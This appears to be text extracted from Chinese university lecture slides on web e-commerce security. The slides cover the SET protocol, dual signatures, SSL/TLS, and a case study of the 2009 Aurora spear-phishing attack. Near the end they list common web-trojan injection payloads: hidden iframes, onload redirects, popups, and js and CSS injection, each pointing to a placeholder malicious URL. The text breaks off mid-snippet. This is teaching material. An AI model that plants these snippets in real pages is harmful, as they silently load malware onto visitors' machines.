Web電子商務安全第十二章主講人：任凱聯系方式：renkai_jlxy@163.com百度云盤：/s/1qWykdjQ1第十二章WEB電子商務安全12.1電子商務概述12.2安全電子商務的體系結構12.3安全電子交易SET12.4安全套接字層SSL12.5數字現金協議12.6網上銀行2B2C是從企業到終端客戶（包括個人消費者和組織消費者）的業務模式。

B2B是企業與企業之間的業務模式。電子商務模式3（1）冒名偷窺。（2）篡改數據。（3）信息丟失。（4）信息傳遞過程中的破壞。

12.1.2電子商務的安全4Internet12.2安全電子商務的體系結構

網絡平臺電子商務基礎平臺電子商務應用系統CA認證中心、支付網關、客戶服務中心

網上投標

網上訂票

網上交費

網上銀行

網上超市

遠程醫療5背景：VISA與MASTERCARD兩大信用卡國際組織共同發起制定保障在因特網上進行安全電子交易的SET(SecureElectronicTransaction)協議由眾多信息產業公司，如Microsoft、Netscape、RSA等共同協作發展而成用途：圍繞客戶、商家等交易各方相互之間身份的確認，采用了電子證書等技術，以保障交易安全12.3安全電子交易SET

612.3.1SET協議概述SET協議主要內容加密算法（RSA和DES）的應用證書消息和對象格式購買消息和對象格式付款消息和對象格式參與者之間的消息協議712.3.1SET協議概述SET支付系統中的相關成員：

81.SET協議消息傳輸過程SET協議消息發送過程:

數字信封：將對稱密鑰通過非對稱公鑰加密的結果分發對稱密鑰的方法12.3.2SET協議工作原理91.SET協議消息傳輸過程

SET協議消息接收過程：12.3.2SET協議工作原理10(1)消費者互聯網購買的物品并形成訂貨單。訂貨單上需包括在線商店、購買物品名稱及數量、交貨時間及地點等相關信息(2)消費者選擇付款方式、確認訂單、簽發付款指令。SET開始介入(3)在SET中，消費者必須對訂單和付款指令進行數字簽名，同時利用雙重簽名技術保證商家看不到消費者的賬號信息(4)在線商店接受訂單后，向消費者所在銀行請求支付認可。信息通過支付網關到持卡人的發卡銀行請求支付認可。批準交易后，返回確認信息給電商(5)電商發送訂單確認信息給消費者(6)電商發送貨物或提供服務，支付網關通知發卡銀行請求支付(7)消費者確認收貨后，支付網關支付給收款銀行2.SET協議流程

12.3.2SET協議工作原理113.雙重簽名產生背景：消費者不想讓銀行看到訂單細節，同時也不想讓商家看到銀行支付信息

例如消息A是訂單信息，消息B是支付信息，或者互換一下12.3.2SET協議工作原理123.雙重簽名消息的驗證例如消息A是訂單信息，消息B是支付信息12.3.1SET協議工作原理13Netscape公司開發的一個網絡安全協議已成為事實上的安全網上交易標準協議三個版本：SSL1.0SSL2.0SSL3.0IETF發布了TLS(TransportLayerSecurity),TLS1.0

通常被稱作SSL3.1TLS1.1TLS1.2SSL與SET最大不同在于SSL是一個雙方協議，僅提供通信雙方的安全保證，而SET協議則提供通信多方的安全保證SSL比SET簡單得多，目前在Web服務中已廣泛使用

12.4安全套接字層SSL(SecureSocketsLayer，SSL）1412.4.1SSL概述SSL功能：客戶認證服務器身份服務器認證客戶身份客戶與服務器自動協商生成密鑰加密客戶與服務器間的數據，并可抵御重放攻擊檢測客戶與服務器間數據的完整性151.SSL協議體系結構SSL僅被廣泛用于HTTP連接SSL位于TCP和應用層協議(如HTTP)之間理論上，SSL可以運行于任何TCP/IP應用程序之上，而不用對其做任何修改12.4.2SSL工作原理16SSL記錄協議在客戶機和服務器之間傳輸應用數據和SSL控制數據2.SSL記錄協議12.4.2SSL工作原理172.SSL記錄協議SSL記錄協議報文格式：

12.4.2SSL工作原理18NetworkandInformationSecurity12.4.2SSL工作原理3.SSL改變密碼規范協議和告警協議195.SSL握手協議：該協議允許客戶和服務器相互驗證、協商加密和MAC算法以及密鑰，用來保護SSL記錄發送的數據。12.4.2SSL工作原理20網絡釣魚流程圖2112.6網上銀行網絡釣魚(SpearPhishing)極光行動（Aurora）2009年12月中旬可能源自中國“精心策劃且目標明確”的一場網絡攻擊，其名稱“Aurora”（意為極光、歐若拉）來自攻擊者電腦上惡意文件所在路徑的一部分。遭受攻擊的除了Google外，還有20多家公司：其中包括AdobeSystems、JuniperNetworks、Rackspace、雅虎、賽門鐵克、諾斯洛普·格魯門和陶氏化工Google表示有部分知識產權遭到盜竊。它認為，黑客的主要興趣在于訪問中國持不同政見者的Gmail帳戶美國國務卿希拉里·克林頓發表了一則簡短聲明譴責此次攻擊事件，并要求中國作出回應[12]。中國政府當時并未做出正式回應美國國會計劃對Google的指控進行調查，后者指控中國政府利用計算機服務監視人權活動人士2212.6網上銀行網絡釣魚(SpearPhishing)極光行動（Aurora）攻擊過程回放：搜集Google員工在Facebook、Twitter等社交網站上發布的信息；利用動態DNS供應商建立托管偽造照片網站的Web服務器，Google員工收到來自信任的人發來的網絡鏈接并且點擊，含有shellcode的JavaScript造成IE瀏覽器溢出，遠程下載并運行程序；通過SSL安全隧道與受害人機器建立連接，持續監聽并最終獲得該雇員訪問Google服務器的帳號密碼等信息；使用該雇員的憑證成功滲透進入Google郵件服務器，進而不斷獲取特定Gmail賬戶的郵件內容信息2312.6網上銀行網絡釣魚(SpearPhishing)極光行動（Aurora）從用戶單擊釣魚郵件那一刻開始講起1.三次握手建立連接2.攻擊者的機器收到一個GET請求3.數據包6返回了一個302碼（重定向頁面）4.從Details面板中可以看到一個Location域，它指明重定向位置是/info?rFfWELUjLJHpP在第9包上右擊“FollowTCPStream”2412.6網上銀行病毒2512.6網上銀行2612.6網上銀行根據顯示的內容找到25包2712.6網上銀行已經獲得了無限制的管理權限2812.6網上銀行一些常用的掛馬方式框架掛馬<iframesrc="網馬地址"width=0height=0></iframe>body掛馬<bodyonload="window.location='網馬地址';"></body>java掛馬<scriptlanguage=javascript>window.open("網馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>js文件掛馬將代碼“document.write("<iframewidth=0height=0src='網馬地址'></iframe>");”保存為muma.js文件，則js文件掛馬代碼為“<scriptlanguage=javascriptsrc=muma.js></script>”2912.6網上銀行一些常用的掛馬方式：css中掛馬body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}高級欺騙<ahref=(迷惑連接地址)onMouseOver="muma();r